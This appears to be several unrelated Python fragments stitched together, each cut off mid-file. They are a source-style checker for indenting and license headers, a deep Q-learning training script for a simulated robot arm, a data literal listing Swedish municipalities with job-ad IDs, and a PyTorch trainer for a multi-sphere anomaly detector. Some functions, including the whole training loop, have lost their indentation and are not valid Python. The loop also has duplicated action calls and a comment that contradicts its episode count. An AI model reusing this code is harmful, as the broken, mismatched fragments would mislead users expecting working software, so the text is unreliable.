    Files in fileIndentingExceptions are skipped. In C/C++ sources
    (.h/.c/.cpp) block-comment continuation lines starting with " *"
    are exempt from the rule. Returns True when the file is compliant.
    """
    log.info("Checking file indenting... [%s]", filePath)
    filePathRelative = filePath[len(projectPath):]
    if filePathRelative in fileIndentingExceptions:
        log.info("File is in exception list: [%s]", filePath)
        return True
    specialFile = os.path.splitext(filePath)[1] in ('.h', '.c', '.cpp')
    status = True
    lineId = 0
    for l in fileLines:
        lineId += 1
        # " */" also starts with " *", so a single prefix test covers both
        # comment-continuation forms (the old second check was dead code).
        if specialFile and l.startswith(" *"):
            continue
        pos = 0
        while pos < len(l) and l[pos] == ' ':
            pos += 1
        if pos % 4 != 0:
            log.error(
                "File is not indented correctly. File = [%s]. Line = %d",
                filePath,
                lineId
            )
            status = False
    # Bug fix: the success message used to be logged unconditionally,
    # claiming correct indenting even after errors were reported.
    if status:
        log.info("File is indented correctly: [%s]", filePath)
    return status
def check_file_license(log, filePath, fileLines):
    """
    Check that the file starts with the project license header, in either
    the '#'-comment form (sharpLicense) or the C block-comment form
    (blockLicense). For .sh files a leading "#!/bin/sh" shebang followed
    by a blank line is allowed before the header. Files listed in
    fileLicenseExceptions are accepted without a license.
    """
    log.info("Checking file license... [%s]", filePath)
    filePathRelative = filePath[len(projectPath):]
    startPos = 0
    hashBang = "#!/bin/sh"
    if os.path.splitext(filePath)[1] == ".sh":
        if len(fileLines) >= 2:
            if fileLines[0] == hashBang and fileLines[1] == "":
                startPos = 2

    def _license_matches(licenseLines):
        # Bug fix: the old length guards compared len(fileLines) against
        # len(license) without accounting for startPos, so a .sh file with
        # a shebang and just under len(license) + 2 lines raised
        # IndexError inside the comparison loop.
        if len(fileLines) - startPos < len(licenseLines):
            return False
        return all(
            licenseLines[i] == fileLines[startPos + i]
            for i in range(len(licenseLines))
        )

    if _license_matches(sharpLicense) or _license_matches(blockLicense):
        log.info("File has license: [%s]", filePath)
        return True
    if filePathRelative in fileLicenseExceptions:
        log.info(
            "File has no license but it is in exception list: [%s]",
            filePath
        )
        return True
    log.error("File has no license: [%s]", filePath)
    return False
def check_header_guard(log, filePath, fileLines):
log.info("Checking header guard... [%s]", filePath)
if os.path.splitext(filePath)[1] != ".h":
log.info("File is not c/c++ header file [%s]", filePath)
return True
if len(fileLines) | |
import os
import tempfile
import pandas
import tensorflow as tf
import zipfile
import cloudpickle
import numpy as np
import random
import gym
from gym_gazebo.envs import gazebo_env
import baselines.common.tf_util as U
from baselines import logger
from baselines.common.schedules import LinearSchedule
from baselines import deepq
from baselines.deepq.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer
from baselines.deepq.build_graph_robotics import build_train
class ActWrapper(object):
    """Picklable wrapper around a deepq act function.

    Bundles the act function with the parameters needed to rebuild it so
    the pair can be serialized to disk (save) and restored (load).
    """
    def __init__(self, act, act_params):
        self._act = act
        self._act_params = act_params

    @staticmethod
    def load(path):
        """Rebuild an ActWrapper (and its TF state) from a save() pickle."""
        with open(path, "rb") as f:
            model_data, act_params = cloudpickle.load(f)
        # Bug fix: the module is imported as `deepq`; the previous
        # `deepqn.build_act(...)` raised NameError.
        act = deepq.build_act(**act_params)
        sess = tf.Session()
        sess.__enter__()
        with tempfile.TemporaryDirectory() as td:
            arc_path = os.path.join(td, "packed.zip")
            with open(arc_path, "wb") as f:
                f.write(model_data)
            zipfile.ZipFile(arc_path, 'r', zipfile.ZIP_DEFLATED).extractall(td)
            U.load_state(os.path.join(td, "model"))
        return ActWrapper(act, act_params)

    def __call__(self, *args, **kwargs):
        # Delegate directly to the wrapped act function.
        return self._act(*args, **kwargs)

    def save(self, path=None):
        """Save model to a pickle located at `path`"""
        if path is None:
            path = os.path.join(logger.get_dir(), "model.pkl")
        with tempfile.TemporaryDirectory() as td:
            U.save_state(os.path.join(td, "model"))
            arc_name = os.path.join(td, "packed.zip")
            with zipfile.ZipFile(arc_name, 'w') as zipf:
                # Pack every file under the temp dir except the archive
                # itself, keeping paths relative to td.
                for root, dirs, files in os.walk(td):
                    for fname in files:
                        file_path = os.path.join(root, fname)
                        if file_path != arc_name:
                            zipf.write(file_path, os.path.relpath(file_path, td))
            with open(arc_name, "rb") as f:
                model_data = f.read()
            with open(path, "wb") as f:
                cloudpickle.dump((model_data, self._act_params), f)
def load(path):
    """Load act function that was returned by learn function.

    Thin module-level convenience wrapper around ActWrapper.load.
    Parameters
    ----------
    path: str
        path to the act function pickle
    Returns
    -------
    act: ActWrapper
        function that takes a batch of observations
        and returns actions.
    """
    return ActWrapper.load(path)
def step(env, action, state):
    """
    Step `env` with `action` interpreted as an element-wise offset of
    `state` rather than an absolute command.

    Overloads the environment's step method for setups where
    actions-as-offsets are required; returns the usual
    (observation, reward, done, info) tuple.
    """
    offset_action = [delta + base for delta, base in zip(action, state)]
    observation, reward, done, info = env.step(offset_action)
    return observation, reward, done, info
def learn(env,
q_func,
lr=5e-4,
max_timesteps=100000,
buffer_size=50000,
exploration_fraction=0.1,
exploration_final_eps=0.02,
train_freq=1,
batch_size=32,
print_freq=100,
checkpoint_freq=1000,
learning_starts=50,
gamma=1.0,
target_network_update_freq=500,
prioritized_replay=False,
prioritized_replay_alpha=0.6,
prioritized_replay_beta0=0.4,
prioritized_replay_beta_iters=None,
prioritized_replay_eps=1e-6,
param_noise=False,
callback=None,
job_id=None,
outdir="/tmp/rosrl/experiments/discrete/deepq/"
):
"""Train a deepqn model.
Parameters
-------
env: gym.Env
environment to train on
q_func: (tf.Variable, int, str, bool) -> tf.Variable
the model that takes the following inputs:
observation_in: object
the output of observation placeholder
num_actions: int
number of actions
scope: str
reuse: bool
should be passed to outer variable scope
and returns a tensor of shape (batch_size, num_actions) with values of every action.
lr: float
learning rate for adam optimizer
max_timesteps: int
number of env steps to optimizer for
buffer_size: int
size of the replay buffer
exploration_fraction: float
fraction of entire training period over which the exploration rate is annealed
exploration_final_eps: float
final value of random action probability
train_freq: int
update the model every `train_freq` steps.
set to None to disable printing
batch_size: int
size of a batched sampled from replay buffer for training
print_freq: int
how often to print out training progress
set to None to disable printing
checkpoint_freq: int
how often to save the model. This is so that the best version is restored
at the end of the training. If you do not wish to restore the best version at
the end of the training set this variable to None.
learning_starts: int
how many steps of the model to collect transitions for before learning starts
gamma: float
discount factor
target_network_update_freq: int
update the target network every `target_network_update_freq` steps.
prioritized_replay: True
if True prioritized replay buffer will be used.
prioritized_replay_alpha: float
alpha parameter for prioritized replay buffer
prioritized_replay_beta0: float
initial value of beta for prioritized replay buffer
prioritized_replay_beta_iters: int
number of iterations over which beta will be annealed from initial value
to 1.0. If set to None equals to max_timesteps.
prioritized_replay_eps: float
epsilon to add to the TD errors when updating priorities.
callback: (locals, globals) -> None
function called at every steps with state of the algorithm.
If callback returns true training stops.
action_no: int
number of actions available in action space
actions_discr: Box space
Discretized actions
Returns
-------
act: ActWrapper
Wrapper over act function. Adds ability to save it and load it.
See header of baselines/deepq/categorical.py for details on the act function.
"""
# Create all the functions necessary to train the model
# sess = tf.Session()
# sess.__enter__()
if job_id is not None:
#Directory for log and Tensorboard data
outdir = '/tmp/rosrl/' + str(env.__class__.__name__) +'/deepq/' + 'sim_' + job_id
else:
outdir = '/tmp/rosrl/' + str(env.__class__.__name__) +'/deepq/'
#TODO This should not go here. Instead pass both action_no and actions as arguments to learn function
#Discrete actions
goal_average_steps = 2
max_number_of_steps = 20
last_time_steps = np.ndarray(0)
n_bins = 10
epsilon_decay_rate = 0.99 ########
it = 1 ######
# Number of states is huge so in order to simplify the situation
# typically, we discretize the space to: n_bins ** number_of_features
joint1_bins = pandas.cut([-np.pi/2, np.pi/2], bins=n_bins, retbins=True)[1][1:-1]
joint2_bins = pandas.cut([-np.pi/2, np.pi/2], bins=n_bins, retbins=True)[1][1:-1]
joint3_bins = pandas.cut([-np.pi/2, np.pi/2], bins=n_bins, retbins=True)[1][1:-1]
action_bins = pandas.cut([-np.pi/2, np.pi/2], bins=n_bins, retbins=True)[1][1:-1]
difference_bins = abs(joint1_bins[0] - joint1_bins[1])
actions_discr = [(difference_bins, 0.0, 0.0), (-difference_bins, 0.0, 0.0),
(0.0, difference_bins, 0.0), (0.0, -difference_bins, 0.0),
(0.0, 0.0, difference_bins), (0.0, 0.0, -difference_bins),
(0.0, 0.0, 0.0)]
action_no = 7
actions = [0, 1, 2, 3, 4, 5, 6]
# capture the shape outside the closure so that the env object is not serialized
# by cloudpickle when serializing make_obs_ph
observation_space_shape = env.observation_space.shape
# with tf.Session(config=tf.ConfigProto()) as session:
def make_obs_ph(name):
return U.BatchInput(observation_space_shape, name=name)
act, train, update_target, debug = build_train(
make_obs_ph=make_obs_ph,
q_func=q_func,
num_actions=action_no,
optimizer=tf.train.AdamOptimizer(learning_rate=lr),
gamma=gamma,
grad_norm_clipping=10,
param_noise=param_noise
)
act_params = {
'make_obs_ph': make_obs_ph,
'q_func': q_func,
#'num_actions': env.action_space.n,
'num_actions': action_no,
}
act = ActWrapper(act, act_params)
# TODO: include also de Prioritized buffer
# # Create the replay buffer
if prioritized_replay:
replay_buffer = PrioritizedReplayBuffer(buffer_size, alpha=prioritized_replay_alpha)
if prioritized_replay_beta_iters is None:
prioritized_replay_beta_iters = max_timesteps
beta_schedule = LinearSchedule(prioritized_replay_beta_iters,
initial_p=prioritized_replay_beta0,
final_p=1.0)
else:
replay_buffer = ReplayBuffer(buffer_size)
beta_schedule = None
# Create the schedule for exploration starting from 1.
exploration = LinearSchedule(schedule_timesteps=int(exploration_fraction * max_timesteps),
initial_p=1.0,
final_p=exploration_final_eps)
# Initialize the parameters and copy them to the target network.
U.initialize()
update_target()
saved_mean_reward = None
obs = env.reset()
reset = True
with tempfile.TemporaryDirectory() as td:
# Log training stuff using tf primitives
summary_writer = tf.summary.FileWriter(outdir, graph=tf.get_default_graph())
# render the environment to visualize the progress
env.render()
sim_r = 0
sim_t = 0
done_quant = 0
model_saved = False
model_file = os.path.join(td, "model")
for e in range(150): # run 10 episodes
print("Episode: ", e)
# reset the environment
obs = env.reset()
print("observation: ", obs[:3])
episode_rewards = [0.0]
for t in range(max_timesteps):
if callback is not None:
if callback(locals(), globals()):
break
# Take action and update exploration to the newest value
kwargs = {}
## TODO: review in more detail
if not param_noise:
update_eps = exploration.value(t)
update_param_noise_threshold = 0.
else:
update_eps = 0.
# # Compute the threshold such that the KL divergence between perturbed and non-perturbed
# # policy is comparable to eps-greedy exploration with eps = exploration.value(t).
# # See Appendix C.1 in Parameter Space Noise for Exploration, Plappert et al., 2017
# # for detailed explanation.
update_param_noise_threshold = -np.log(1. - exploration.value(t) + exploration.value(t) / float(env.action_space.n))
kwargs['reset'] = reset
kwargs['update_param_noise_threshold'] = update_param_noise_threshold
kwargs['update_param_noise_scale'] = True
action = act(np.array(obs)[None], update_eps=update_eps, **kwargs)[0]
if isinstance(env.action_space, gym.spaces.MultiBinary):
env_action = np.zeros(env.action_space.n)
env_action[action] = 1
else:
env_action = action
update_eps = exploration.value(t)
update_param_noise_threshold = 0.
# Choose action
action = act(np.array(obs)[None], update_eps=update_eps, **kwargs)[0]
reset = False
new_obs, rew, done, _ = step(env, actions_discr[action], obs[:3])
# Store transition in the replay buffer.
replay_buffer.add(obs, action, rew, new_obs, float(done))
obs = new_obs
episode_rewards[-1] += rew
# RK: removed this, too many prints
# print("reward: ", rew)
# Log the episode reward
#summary = tf.Summary(value=[tf.Summary.Value(tag="Episode reward", simple_value = episode_rewards[-1]/(t + 1))])
#summary_writer.add_summary(summary, t+ e*max_timesteps)
# print("average episode reward: ", episode_rewards[-1]/(t + 1))
sim_r += rew
sim_t += 1
if done:
# summary = tf.Summary(value=[tf.Summary.Value(tag="Mean episode reward", simple_value = episode_rewards[-1]/(t + 1))])
# summary_writer.add_summary(summary, t)
done_quant += 1
print("Done!")
obs = env.reset()
episode_rewards.append(0.0)
reset = True
if t+ e*max_timesteps > learning_starts and t % | |
'0584', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 6,
'ad_ids': ['24636656', '24631849', '24613868', '24605632', '24597399', '24579124']},
{'id': 'stqv_JGB_x8A', 'name': 'Mjölby', 'type': 'municipality', 'code': '0586', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 17,
'ad_ids': ['24648019', '24644313', '24632147', '24628098', '24622278', '24616742', '24596459', '24615796',
'24613095', '24605455']},
{'id': 'yaHU_E7z_YnE', 'name': 'Lekeberg', 'type': 'municipality', 'code': '1814', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 3, 'ad_ids': ['24618574', '24590700', '24573858']},
{'id': 'oYEQ_m8Q_unY', 'name': 'Laxå', 'type': 'municipality', 'code': '1860', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24613284']},
{'id': 'Ak9V_rby_yYS', 'name': 'Hallsberg', 'type': 'municipality', 'code': '1861', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 5, 'ad_ids': ['24645029', '24641916', '24630258', '24625794', '23791205']},
{'id': 'pvzC_muj_rcq', 'name': 'Degerfors', 'type': 'municipality', 'code': '1862', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24640136', '24612483']},
{'id': 'sCbY_r36_xhs', 'name': 'Hällefors', 'type': 'municipality', 'code': '1863', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24597505', '24562629']},
{'id': 'eF2n_714_hSU', 'name': 'Ljusnarsberg', 'type': 'municipality', 'code': '1864', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24620853']},
{'id': 'kuMn_feU_hXx', 'name': 'Örebro', 'type': 'municipality', 'code': '1880', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 83,
'ad_ids': ['24650582', '24650365', '24649289', '24649147', '24648442', '24648272', '24648247', '24647801',
'24646747', '24646234']},
{'id': 'viCA_36P_pQp', 'name': 'Kumla', 'type': 'municipality', 'code': '1881', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 6,
'ad_ids': ['24628041', '24627103', '24620812', '24612404', '24591455', '24525516']},
{'id': 'dbF7_Ecz_CWF', 'name': 'Askersund', 'type': 'municipality', 'code': '1882', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24614139']},
{'id': 'wgJm_upX_z5W', 'name': 'Karlskoga', 'type': 'municipality', 'code': '1883', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 14,
'ad_ids': ['24641108', '24640044', '24638125', '24627556', '24626010', '24619701', '24614690', '24596123',
'24574044', '24506835']},
{'id': 'WFXN_hsU_gmx', 'name': 'Nora', 'type': 'municipality', 'code': '1884', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24645958', '24641024']},
{'id': 'JQE9_189_Ska', 'name': 'Lindesberg', 'type': 'municipality', 'code': '1885', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 9,
'ad_ids': ['24621412', '24640141', '24640009', '24631398', '24629694', '24619671', '24594052', '24563255',
'24559937']},
{'id': 'Nufj_vmt_VrH', 'name': 'Skinnskatteberg', 'type': 'municipality', 'code': '1904', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 2, 'ad_ids': ['24616844', '24561824']},
{'id': 'jfD3_Hdg_UhT', 'name': 'Surahammar', 'type': 'municipality', 'code': '1907', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 2, 'ad_ids': ['24569744', '24569099']},
{'id': 'sD2e_1Tr_4WZ', 'name': 'Heby', 'type': 'municipality', 'code': '0331', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 6,
'ad_ids': ['24639987', '24637102', '24636561', '24622419', '24609485', '24606439']},
{'id': 'Fac5_h7a_UoM', 'name': 'Kungsör', 'type': 'municipality', 'code': '1960', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 1, 'ad_ids': ['24615040']},
{'id': 'oXYf_HmD_ddE', 'name': 'Hallstahammar', 'type': 'municipality', 'code': '1961', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 3, 'ad_ids': ['24620856', '24620183', '24570400']},
{'id': 'jbVe_Cps_vtd', 'name': 'Norberg', 'type': 'municipality', 'code': '1962', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 1, 'ad_ids': ['24615173']},
{'id': '8deT_FRF_2SP', 'name': 'Västerås', 'type': 'municipality', 'code': '1980', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 53,
'ad_ids': ['24650320', '24648681', '24647561', '24647061', '24646018', '24645554', '24645115', '24643524',
'24643419', '24641832']},
{'id': 'dAen_yTK_tqz', 'name': 'Sala', 'type': 'municipality', 'code': '1981', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 9,
'ad_ids': ['24647939', '24629771', '24628165', '24627608', '24625106', '24625081', '24618592', '24607178',
'24568713']},
{'id': '7D9G_yrX_AGJ', 'name': 'Fagersta', 'type': 'municipality', 'code': '1982', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 6,
'ad_ids': ['24642864', '24636952', '24621583', '24611864', '24610150', '24596200']},
{'id': '4Taz_AuG_tSm', 'name': 'Köping', 'type': 'municipality', 'code': '1983', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 5,
'ad_ids': ['24641084', '24633855', '24614521', '24579728', '24554788']},
{'id': 'Jkyb_5MQ_7pB', 'name': 'Arboga', 'type': 'municipality', 'code': '1984', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 6,
'ad_ids': ['24634844', '24632224', '24630389', '24629338', '24628382', '24523724']},
{'id': '1gEC_kvM_TXK', 'name': 'Olofström', 'type': 'municipality', 'code': '1060', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 3, 'ad_ids': ['24650780', '24607103', '24588059']},
{'id': 'YSt4_bAa_ccs', 'name': 'Karlskrona', 'type': 'municipality', 'code': '1080', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 28,
'ad_ids': ['24651075', '24649518', '24649448', '24645432', '24645121', '24644839', '24628869', '24633251',
'24633023', '24630721']},
{'id': 'vH8x_gVz_z7R', 'name': 'Ronneby', 'type': 'municipality', 'code': '1081', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 10,
'ad_ids': ['24648307', '24648283', '24635765', '24621669', '24621710', '24620613', '24605177', '24605428',
'24603527', '24590026']},
{'id': 'HtGW_WgR_dpE', 'name': 'Karlshamn', 'type': 'municipality', 'code': '1082', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 15,
'ad_ids': ['24649847', '24649768', '24647740', '24632517', '24612809', '24607875', '24607874', '24602594',
'24600682', '24600425']},
{'id': 'EVPy_phD_8Vf', 'name': 'Sölvesborg', 'type': 'municipality', 'code': '1083', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 4, 'ad_ids': ['24644857', '24625704', '24620694', '24535492']},
{'id': '2r6J_g2w_qp5', 'name': 'Svalöv', 'type': 'municipality', 'code': '1214', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 1, 'ad_ids': ['24645986']},
{'id': 'vBrj_bov_KEX', 'name': 'Staffanstorp', 'type': 'municipality', 'code': '1230', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24648873', '24623551', '24614129', '24598158', '24593510', '24562275', '24565177', '24514487']},
{'id': '64g5_Lio_aMU', 'name': 'Burlöv', 'type': 'municipality', 'code': '1231', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 9,
'ad_ids': ['24649934', '24624002', '24615590', '24596313', '24598750', '24592314', '24583797', '24565624',
'24440835']},
{'id': 'Tcog_5sH_b46', 'name': 'Vellinge', 'type': 'municipality', 'code': '1233', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 3, 'ad_ids': ['24637147', '24622105', '24546803']},
{'id': 'LTt7_CGG_RUf', 'name': '<NAME>', 'type': 'municipality', 'code': '1256', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24615444', '24610769', '24593919', '24589529']},
{'id': 'nBTS_Nge_dVH', 'name': 'Örkelljunga', 'type': 'municipality', 'code': '1257', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 1, 'ad_ids': ['24620885']},
{'id': 'waQp_FjW_qhF', 'name': 'Bjuv', 'type': 'municipality', 'code': '1260', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 2, 'ad_ids': ['24614178', '24590365']},
{'id': '5ohg_WJU_Ktn', 'name': 'Kävlinge', 'type': 'municipality', 'code': '1261', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 10,
'ad_ids': ['24645728', '24640743', '24637954', '24634361', '24631933', '24622076', '24615122', '24601405',
'24584558', '24570281']},
{'id': 'naG4_AUS_z2v', 'name': 'Lomma', 'type': 'municipality', 'code': '1262', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 10,
'ad_ids': ['24650188', '24649514', '24630578', '24607479', '24607474', '24593043', '24587683', '24555292',
'24549470', '24500680']},
{'id': 'n6r4_fjK_kRr', 'name': 'Svedala', 'type': 'municipality', 'code': '1263', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24648311', '24624676', '24615959', '24590287']},
{'id': 'oezL_78x_r89', 'name': 'Skurup', 'type': 'municipality', 'code': '1264', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24606877', '24596998', '24590239', '24555159']},
{'id': 'P3Cs_1ZP_9XB', 'name': 'Sjöbo', 'type': 'municipality', 'code': '1265', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24636041', '24624217', '24572488', '24562106', '24415688']},
{'id': 'autr_KMa_cfp', 'name': 'Hörby', 'type': 'municipality', 'code': '1266', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24647623', '24612427', '24598016', '24585770', '24576073', '24575956', '24388252']},
{'id': 'N29z_AqQ_Ppc', 'name': 'Höör', 'type': 'municipality', 'code': '1267', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24645789', '24611931', '24590427', '24580373', '24533802', '24524712', '24505268', '24495006']},
{'id': 'UMev_wGs_9bg', 'name': 'Tomelilla', 'type': 'municipality', 'code': '1270', 'region_code': '12',
'region_name': '<NAME>', 'hits': 5, 'ad_ids': ['24629168', '24624712', '24621866', '24620688', '24616138']},
{'id': 'WMNK_PXa_Khm', 'name': 'Bromölla', 'type': 'municipality', 'code': '1272', 'region_code': '12',
'region_name': '<NAME>', 'hits': 8,
'ad_ids': ['24648756', '24645758', '24645101', '24624728', '24584175', '24582959', '24513573', '24513519']},
{'id': 'najS_Lvy_mDD', 'name': 'Osby', 'type': 'municipality', 'code': '1273', 'region_code': '12',
'region_name': '<NAME>', 'hits': 6,
'ad_ids': ['24622447', '24612064', '24590486', '24584265', '24570384', '24484317']},
{'id': 'BN7r_iPV_F9p', 'name': 'Perstorp', 'type': 'municipality', 'code': '1275', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 3, 'ad_ids': ['24644535', '24620267', '24590493']},
{'id': 'JARU_FAY_hTS', 'name': 'Klippan', 'type': 'municipality', 'code': '1276', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 11,
'ad_ids': ['24649729', '24645668', '24630230', '24630125', '24627948', '24613981', '24602922', '24592988',
'24587696', '24576122']},
{'id': 'tEv6_ktG_QQb', 'name': 'Åstorp', 'type': 'municipality', 'code': '1277', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24646009', '24643953', '24611585', '24576459', '24572768', '24572674', '24488210']},
{'id': 'i8vK_odq_6ar', 'name': 'Båstad', 'type': 'municipality', 'code': '1278', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 6,
'ad_ids': ['24648777', '24642713', '24635648', '24546923', '24546926', '24437820']},
{'id': 'oYPt_yRA_Smm', 'name': 'Malmö', 'type': 'municipality', 'code': '1280', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 208,
'ad_ids': ['24650545', '24650520', '24650296', '24650097', '24650060', '24649950', '24648137', '24647586',
'24647704', '24647414']},
{'id': 'muSY_tsR_vDZ', 'name': 'Lund', 'type': 'municipality', 'code': '1281', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 94,
'ad_ids': ['24650438', '24650135', '24649589', '24648781', '24647011', '24647010', '24646930', '24646668',
'24645906', '24645894']},
{'id': 'Yt5s_Vf9_rds', 'name': 'Landskrona', 'type': 'municipality', 'code': '1282', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 13,
'ad_ids': ['24644146', '24644087', '24620576', '24620131', '24615771', '24573791', '24570452', '24567461',
'24540874', '24488640']},
{'id': 'qj3q_oXH_MGR', 'name': 'Helsingborg', 'type': 'municipality', 'code': '1283', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 75,
'ad_ids': ['24649269', '24648344', '24647195', '24645865', '24645699', '24644730', '24644155', '24643877',
'24643808', '24643688']},
{'id': '8QQ6_e95_a1d', 'name': 'Höganäs', 'type': 'municipality', 'code': '1284', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24634533', '24625162', '24623134', '24620349', '24576341']},
{'id': 'gfCw_egj_1M4', 'name': 'Eslöv', 'type': 'municipality', 'code': '1285', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24634664', '24629637', '24616790', '24608987', '24607603', '24603214', '24500582']},
{'id': 'hdYk_hnP_uju', 'name': 'Ystad', 'type': 'municipality', 'code': '1286', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 11,
'ad_ids': ['24644036', '24625823', '24601172', '24599304', '24583510', '24574648', '24572130', '24511562',
'24511260', '24473915']},
{'id': 'STvk_dra_M1X', 'name': 'Trelleborg', 'type': 'municipality', 'code': '1287', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 18,
'ad_ids': ['24649417', '24645920', '24645911', '24640015', '24632826', '24630587', '24614377', | |
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
import time
import logging
from sklearn.metrics import roc_auc_score
from sklearn.cluster import KMeans
from sklearn.manifold import TSNE
from src.models.optim.Loss_Functions import DMSADLoss
from src.utils.utils import print_progessbar
class DMSAD_trainer:
"""
Trainer for the DMSAD.
"""
def __init__(self, c, R, eta=1.0, gamma=0.05, n_sphere_init=100, n_epoch=150,
lr=1e-4, lr_milestone=(), batch_size=64, weight_decay=1e-6,
device='cuda', n_job_dataloader=0, print_batch_progress=False):
"""
Constructor of the DMSAD trainer.
----------
INPUT
|---- c (array like N_sphere x Embed dim) the centers of the hyperspheres.
| If None, the centers are initialized using Kmeans.
|---- R (1D array) the radii associated with the centers.
|---- eta (float) the weight of semi-supervised labels in the loss.
|---- gamma (float) the fraction of allowed outlier when setting the
| radius of each sphere in the end.
|---- n_sphere_init (int) the number of initial hypersphere.
|---- n_epoch (int) the number of epoch.
|---- lr (float) the learning rate.
|---- lr_milestone (tuple) the lr update steps.
|---- batch_size (int) the batch_size to use.
|---- weight_decay (float) the weight_decay for the Adam optimizer.
|---- device (str) the device to work on ('cpu' or 'cuda').
|---- n_job_dataloader (int) number of workers for the dataloader.
|---- print_batch_progress (bool) whether to dispay the batch
| progress bar.
OUTPUT
|---- None
"""
# learning parameters
self.n_epoch = n_epoch
self.lr = lr
self.lr_milestone = lr_milestone
self.batch_size = batch_size
self.weight_decay = weight_decay
self.device = device
self.n_job_dataloader = n_job_dataloader
self.print_batch_progress = print_batch_progress
# DMSAD parameters
self.c = torch.tensor(c, device=self.device) if c is not None else None
self.R = torch.tensor(R, device=self.device) if R is not None else None
self.eta = eta
self.gamma = gamma
self.n_sphere_init = n_sphere_init
# Optimization parameters
self.eps = 1e-6
# Results
self.train_time = None
self.train_loss = None
self.eval_auc = None
self.eval_time = None
self.eval_scores = None
    def train(self, dataset, net, valid_dataset=None):
        """
        Train the DMSAD network on the provided dataset.
        ----------
        INPUT
        |---- dataset (torch.utils.data.Dataset) the dataset on which the
        |           network is trained. It must return an image, label, mask,
        |           semi-supervized labels and the index.
        |---- net (nn.Module) The DeepSAD to train. The forward pass must
        |           return both a reconstruction and an embedding of the input.
        |---- valid_dataset (torch.utils.data.Dataset) the dataset on which
        |           to validate the network at each epoch. Not validated if
        |           not provided.
        OUTPUT
        |---- net (nn.Module) The trained DeepSAD.
        """
        logger = logging.getLogger()
        # make the train dataloader
        train_loader = torch.utils.data.DataLoader(dataset, batch_size=self.batch_size, \
                            shuffle=True, num_workers=self.n_job_dataloader)
        # put net to device
        net = net.to(self.device)
        # initialize hypersphere centers with K-Means if none were given to __init__
        if self.c is None:
            logger.info(' Initializing the hypersphere centers.')
            self.initialize_centers(train_loader, net)
            logger.info(f' {self.c.shape[0]} centers successfully initialized.')
        # define loss criterion
        loss_fn = DMSADLoss(self.eta, eps=self.eps)
        # define optimizer
        optimizer = optim.Adam(net.parameters(), lr=self.lr, weight_decay=self.weight_decay)
        # define scheduler (lr divided by 10 at each milestone)
        scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=self.lr_milestone, gamma=0.1)
        # Start training
        logger.info('Start Training the DMSAD.')
        start_time = time.time()
        epoch_loss_list = []
        n_batch = len(train_loader)
        for epoch in range(self.n_epoch):
            net.train()
            epoch_loss = 0.0
            epoch_start_time = time.time()
            # n_k[i] counts the normal samples whose closest center is c_i;
            # used after the epoch to prune under-populated spheres
            n_k = torch.zeros(self.c.shape[0], device=self.device)
            for b, data in enumerate(train_loader):
                # get input and semi-supervized labels
                input, _, _, semi_label, _ = data
                # put them to device
                # NOTE(review): requires_grad_(True) on the input looks
                # unnecessary — only net parameters need gradients; confirm.
                input = input.to(self.device).float().requires_grad_(True)
                semi_label = semi_label.to(self.device)
                # zero the network's gradients
                optimizer.zero_grad()
